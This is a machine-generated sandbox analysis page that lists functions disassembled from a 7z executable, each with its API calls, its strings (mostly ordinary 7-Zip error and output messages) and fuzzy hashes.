                                Function 004298F0 Relevance: 25.2, APIs: 20, Instructions: 170COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 6324547189e8b2bcaad28c273deeb380217af71a168f8b56e1851644d94c6114
                                • Instruction ID: 7dfc96cea1063af4f2cb6d68102c0d04adeed60fef8d8689bad401860b78adf2
                                • Opcode Fuzzy Hash: 6324547189e8b2bcaad28c273deeb380217af71a168f8b56e1851644d94c6114
                                • Instruction Fuzzy Hash: 1A513E36341B9886CB15EE32E5916AE6320FB85F99F5C423BDE2E5B714CF68CC458318
                                Function 0045D810 Relevance: 24.4, APIs: 12, Strings: 4, Instructions: 361COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ClearVariant
                                • String ID: 2$?$?$Z
                                • API String ID: 1677346816-1743634682
                                • Opcode ID: a78526e38cb49b708f68608ae898e3687e87b602a16de861b12778e0e2767a4b
                                • Instruction ID: ad9e3fcc5bcb2f232e4ad9a8c752d6a878a091b08ff370d65384acc54fc659ba
                                • Opcode Fuzzy Hash: a78526e38cb49b708f68608ae898e3687e87b602a16de861b12778e0e2767a4b
                                • Instruction Fuzzy Hash: 74D1D832A5458492CA30DB26D4801AF7331FBD5789F414217EE8E8777ADF6CC98ACB09
                                Function 00467558 Relevance: 23.8, APIs: 19, Instructions: 79COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 7b9701e2983c76c0a1a72bf315f80d4a189fe68506923e36d5f0ecddaa314cc9
                                • Instruction ID: 1de415ea74ca78ba4278a03b844f3e5059b982047b2f8528ab365cdf43deaf77
                                • Opcode Fuzzy Hash: 7b9701e2983c76c0a1a72bf315f80d4a189fe68506923e36d5f0ecddaa314cc9
                                • Instruction Fuzzy Hash: F331DE32251A4D82CB11FE37EA512AD2320EB85F9CF49023B9E2D9F755DE5CCC928358
                                Function 004177B4 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 131threadCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$CountCurrentErrorLastTick$CreateDirectoryProcessThread
                                • String ID: .tmp$d
                                • API String ID: 503816515-2797371523
                                • Opcode ID: 8d85b33d1c4212d765841e3d2838b488823a18ecd111e72283a08dac768acac0
                                • Instruction ID: dd7167be68a7c7f3823b891f6aa84ad4000d8e05f4aa76d9ef2ee85a3c4cbd71
                                • Opcode Fuzzy Hash: 8d85b33d1c4212d765841e3d2838b488823a18ecd111e72283a08dac768acac0
                                • Instruction Fuzzy Hash: E6410573218544D5DB30AB26E84039E6B71B785BE8F440217EEAE87765CE7CC9C6C709
                                Function 0042A9FC Relevance: 22.7, APIs: 18, Instructions: 156COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID:
                                • API String ID: 1534225298-0
                                • Opcode ID: 764178e90417daa3f42c49e3cbf3510b889c5f101c1e8c7e16ca167c2b5fa648
                                • Instruction ID: e97f1cd91d0a17a169836ede092f9aec439d8251e85393fad59305ff757dfb23
                                • Opcode Fuzzy Hash: 764178e90417daa3f42c49e3cbf3510b889c5f101c1e8c7e16ca167c2b5fa648
                                • Instruction Fuzzy Hash: EB51DA32344B9583DB20EA22F59125E9710EB85BD8F880227EF9D47719CF6CC9A6C709
                                Function 00424E4C Relevance: 22.7, APIs: 13, Strings: 2, Instructions: 156COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • zero size last volume is not allowed, xrefs: 00425062
                                • Incorrect volume size:, xrefs: 0042503C
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove$ExceptionThrow
                                • String ID: Incorrect volume size:$zero size last volume is not allowed
                                • API String ID: 3957182552-998621408
                                • Opcode ID: ca37d54a7fa88057a717ca580f3b84c90e82dc324110684d6e4634f1a47e3e16
                                • Instruction ID: d7c9661a7092220bbb4ffb2b27274fdbd8793ed751c1ea2ec8edca075253aa43
                                • Opcode Fuzzy Hash: ca37d54a7fa88057a717ca580f3b84c90e82dc324110684d6e4634f1a47e3e16
                                • Instruction Fuzzy Hash: 0F616C72304A89A2DB24EB26E9903EEA321F785B88F804117DB9D87765DF7CC995C704
                                Function 0045D4F8 Relevance: 21.2, APIs: 13, Strings: 1, Instructions: 197COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID: ..\
                                • API String ID: 1294909896-2756224523
                                • Opcode ID: 2d616d1f092bf375b5cc6aa2bb401b026288b91804a8fd3acb80ee064d591f2f
                                • Instruction ID: e4843e7556c7bb27685f1c683e1ff3f9531dfacb30398aa667c70ce97c8742d4
                                • Opcode Fuzzy Hash: 2d616d1f092bf375b5cc6aa2bb401b026288b91804a8fd3acb80ee064d591f2f
                                • Instruction Fuzzy Hash: FB61B332B1568486CB20EF26E49025E6720FBC5B99F980127EF5E5B759DF7CC846C708
                                Function 0046033C Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 71COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$free$fputc
                                • String ID: Modified: $Path: $Size:
                                • API String ID: 2662072562-3207571042
                                • Opcode ID: ab0c2db7b3c0e74294e911378d1f21f9ff1e2710fb8d42cb9be6ab44b3a0eafd
                                • Instruction ID: 6c67e42a8377b9e729520b102b58e7c0d05640defc5c544776cf730cc7bab93c
                                • Opcode Fuzzy Hash: ab0c2db7b3c0e74294e911378d1f21f9ff1e2710fb8d42cb9be6ab44b3a0eafd
                                • Instruction Fuzzy Hash: 152132B2215A01C2DA10EF16EA5036E2321FB85BEDF4482269F6D477E5DF2CC559C309
                                Function 0045179A Relevance: 20.1, APIs: 16, Instructions: 90COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: a34c07180234e12b002462881317195d17831750ce67edd19fac51360f5d6a67
                                • Instruction ID: 79dc41016645e37c1cb32cb032c66d42237e722f41530ed87265533aa99ba788
                                • Opcode Fuzzy Hash: a34c07180234e12b002462881317195d17831750ce67edd19fac51360f5d6a67
                                • Instruction Fuzzy Hash: 1A21513228968D43CB10FB32E5516AE6710EBC2F89F401527EE5A97721CE7CC4A78708
                                Function 00454824 Relevance: 18.2, APIs: 5, Strings: 7, Instructions: 210COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID: : $ : MINOR_ERROR$...$Junction: $Link: $REPARSE:$WSL:
                                • API String ID: 1534225298-3981964144
                                • Opcode ID: 2bf224b8c6430fcf35db2824f17603b96da4f2cdf43c971f167d23e4c8ada00c
                                • Instruction ID: 2ff81f84afc44f180412b214c7fa96e809ae8126d5dec794aead19f16daea83a
                                • Opcode Fuzzy Hash: 2bf224b8c6430fcf35db2824f17603b96da4f2cdf43c971f167d23e4c8ada00c
                                • Instruction Fuzzy Hash: AF71257220460186DB20EF26E8523AE7764E7C179DF445127EE4A4B75ADFBCC9C9C708
                                Function 0041D298 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 85libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$AddressHandleModuleProc
                                • String ID: : $ SP:$RtlGetVersion$Windows$ntdll.dll
                                • API String ID: 399046674-586651410
                                • Opcode ID: 51a7da11933e7792f8993f7090476a80b9ee33e58fdb39d0906823acee528ced
                                • Instruction ID: 11f1b0e4eea07c6407721329caf1ae4749a70035c34d097b40f202f0dc747d29
                                • Opcode Fuzzy Hash: 51a7da11933e7792f8993f7090476a80b9ee33e58fdb39d0906823acee528ced
                                • Instruction Fuzzy Hash: 1E31417321868592CA20EF15E9913DEA770F7D4748F805217F69D426B9DFBCCA89CB08
                                Function 00462E04 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 52COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs
                                • String ID: = $ERROR$ERRORS:$WARNING$WARNINGS:
                                • API String ID: 1795875747-2836439314
                                • Opcode ID: deb63fc6d31ce95afea9bbb749a350c3005a631048944af1174f6f81a7a761c9
                                • Instruction ID: 3eeef1efaf900fb009c21e30bf6df9431cccbbaa12da9fc3377c05cd50d3a4c2
                                • Opcode Fuzzy Hash: deb63fc6d31ce95afea9bbb749a350c3005a631048944af1174f6f81a7a761c9
                                • Instruction Fuzzy Hash: C51184E1314A50A2EB259F16DA443597721B754B89F489023CF4D07B50EBBEC9A9C30A
                                Function 00466478 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$free
                                • String ID: $ MB$ Memory =
                                • API String ID: 3873070119-2616823926
                                • Opcode ID: a49bfbddc163a04b4ae8ca9172c6382178121f8a6e5564e2a5d71c7932fa1ea2
                                • Instruction ID: 3d72d9c290467ee29f3a6f1808e20d0a6fed0a352f56a93dcd3879e8ceaf06fe
                                • Opcode Fuzzy Hash: a49bfbddc163a04b4ae8ca9172c6382178121f8a6e5564e2a5d71c7932fa1ea2
                                • Instruction Fuzzy Hash: 78110DF2205A41D2DB109B16E85535A2320EBD8BE9F449226DF2E437B8DF3CC999C708
                                Function 00462D88 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 32COMMON
                                Download Yara Rule
                                APIs
                                • fputs.MSVCRT ref: 00462DA3
                                • fputs.MSVCRT ref: 00462DC0
                                • fputs.MSVCRT ref: 00462DD0
                                  • Part of subcall function 00412790: fputs.MSVCRT ref: 004127D9
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127E5
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127F0
                                • fputs.MSVCRT ref: 00462DEE
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$free
                                • String ID: : Cannot open the file as [$ERROR$Open $WARNING$] archive
                                • API String ID: 3873070119-657955069
                                • Opcode ID: 847c8679c7ee772cfa0ad331b0400e68872ccc8d0d254d1dc022f7c0616b6f24
                                • Instruction ID: 7d1cdb48c85e7bb797b78e8e1300216df866b738cf8054d4d6a780e91999fb44
                                • Opcode Fuzzy Hash: 847c8679c7ee772cfa0ad331b0400e68872ccc8d0d254d1dc022f7c0616b6f24
                                • Instruction Fuzzy Hash: 81F04FE5319E01D6EE10DF26E9543993321AB89FD8F849022CF0E07760DF2CC489C308
                                Function 00417258 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 87libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$AddressHandleModuleProc
                                • String ID: CreateHardLinkW$kernel32.dll
                                • API String ID: 399046674-294928789
                                • Opcode ID: 9f6cbca637d8032f0e3d3d93c8c5b3ec0ac9f608109c27f1738fc1a47266ce67
                                • Instruction ID: 4e851c7604f8d2beffd807ba5d1506b7c96fc66d01f95b5ea7eafd03ec751c8c
                                • Opcode Fuzzy Hash: 9f6cbca637d8032f0e3d3d93c8c5b3ec0ac9f608109c27f1738fc1a47266ce67
                                • Instruction Fuzzy Hash: 8C21E57324955551CE60EB26E8917EF5360EBC2BE4F541227FE6A87361DE2CC8C6C708
                                Function 004205D0 Relevance: 13.9, APIs: 11, Instructions: 177COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 1105f6b78d77d2f27ce0ece3876efea841341b0fd366a0656fc019e294026a87
                                • Instruction ID: eeb5fd78b1ad1033e8ed92886e38b1d645c011ad270fccf9746b28456f6b4dd5
                                • Opcode Fuzzy Hash: 1105f6b78d77d2f27ce0ece3876efea841341b0fd366a0656fc019e294026a87
                                • Instruction Fuzzy Hash: 6E519236315A5496CB20EF26E45019FA7A0E7C4BD8B94021BFE5E47765EF3CC992CB08
                                Function 0042A24C Relevance: 13.8, APIs: 8, Strings: 1, Instructions: 267COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ClearVariant
                                • String ID: \??\
                                • API String ID: 1473721057-3047946824
                                • Opcode ID: 9f9bbcf5d18d30a3798993ee832e19fae9996f9b02919a846ef4ed57bb486a54
                                • Instruction ID: 239377d9d6e9c267c5e611dc230a73382e40eb1cfe72ca221df7f3755ef200e8
                                • Opcode Fuzzy Hash: 9f9bbcf5d18d30a3798993ee832e19fae9996f9b02919a846ef4ed57bb486a54
                                • Instruction Fuzzy Hash: 6DB14D32209694D6CB10DF35E44429E7760F785B88F984127EE8A4B729CF3DC8A6C71A
                                Function 0044A948 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 146COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID: hash
                                • API String ID: 1534225298-3518522040
                                • Opcode ID: 2071902370ea14b5b163f69b3a0fcafdd086ae38bc45d5d212b601ffc978602b
                                • Instruction ID: 49293c460e5aaa6fec5538bd13aae5e029e12bdda650a4e409a798e1272a54f3
                                • Opcode Fuzzy Hash: 2071902370ea14b5b163f69b3a0fcafdd086ae38bc45d5d212b601ffc978602b
                                • Instruction Fuzzy Hash: AE51243228878085EB35AF26E5002AE7761D781B9CF144107EF5A477A9DBBCC5E6C30A
                                Function 004241F4 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 132COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00411E58: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411E9F
                                • _CxxThrowException.MSVCRT ref: 004242EE
                                  • Part of subcall function 004138A8: free.MSVCRT ref: 004138E0
                                  • Part of subcall function 004139AC: memmove.MSVCRT ref: 004139D9
                                • free.MSVCRT ref: 004242A5
                                • _CxxThrowException.MSVCRT ref: 004242C8
                                • _CxxThrowException.MSVCRT ref: 00424322
                                • free.MSVCRT ref: 004243B6
                                • free.MSVCRT ref: 004243BE
                                • free.MSVCRT ref: 004243CC
                                Strings
                                • Incorrect item in listfile.Check charset encoding and -scs switch., xrefs: 004242D1, 00424305
                                • The file operation error for listfile, xrefs: 00424268
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ExceptionThrow$ErrorLastmemmove
                                • String ID: Incorrect item in listfile.Check charset encoding and -scs switch.$The file operation error for listfile
                                • API String ID: 2826704872-1487508633
                                • Opcode ID: 351beeec67b9c65a241a4d84b79b58a5cc51cb1c205b001d3c70bc4642ae7688
                                • Instruction ID: 79f4f99401b4a8a2f7b097fa033be1af3e9e851698cc26cb913b941117920462
                                • Opcode Fuzzy Hash: 351beeec67b9c65a241a4d84b79b58a5cc51cb1c205b001d3c70bc4642ae7688
                                • Instruction Fuzzy Hash: 0141AC72314A9592CA10DF56E98039EA321F7D5BD4F80412AEF8907B68DFBCC945CB48
                                Function 00448580 Relevance: 13.6, APIs: 9, Instructions: 104COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmovewcscmp
                                • String ID:
                                • API String ID: 3584677832-0
                                • Opcode ID: 217eeff2f744b3f7c7605ef73134d3b2b6671ebe322cc1af78b4ca430cd740c0
                                • Instruction ID: f2bc3ed9a9037342cee397d5415a9e61dbfee0162ba8c01534b084792f306611
                                • Opcode Fuzzy Hash: 217eeff2f744b3f7c7605ef73134d3b2b6671ebe322cc1af78b4ca430cd740c0
                                • Instruction Fuzzy Hash: A0418E72314A4582EB10DF26E59035EA720E7C5BE4F54022AEFAE47B68DF7CC985CB04
                                Function 00426904 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 100COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004135B8: memmove.MSVCRT ref: 004135F0
                                  • Part of subcall function 00413958: memmove.MSVCRT ref: 00413997
                                • free.MSVCRT ref: 0042693E
                                • free.MSVCRT ref: 00426983
                                • free.MSVCRT ref: 004269B0
                                • free.MSVCRT ref: 004269E6
                                • free.MSVCRT ref: 00426A50
                                  • Part of subcall function 0041960C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,00000000,?,?,00000000,?,00000003,00000003), ref: 0041961E
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
